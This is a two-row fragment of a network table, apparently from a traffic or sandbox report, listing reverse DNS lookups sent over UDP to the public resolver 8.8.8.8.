| US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |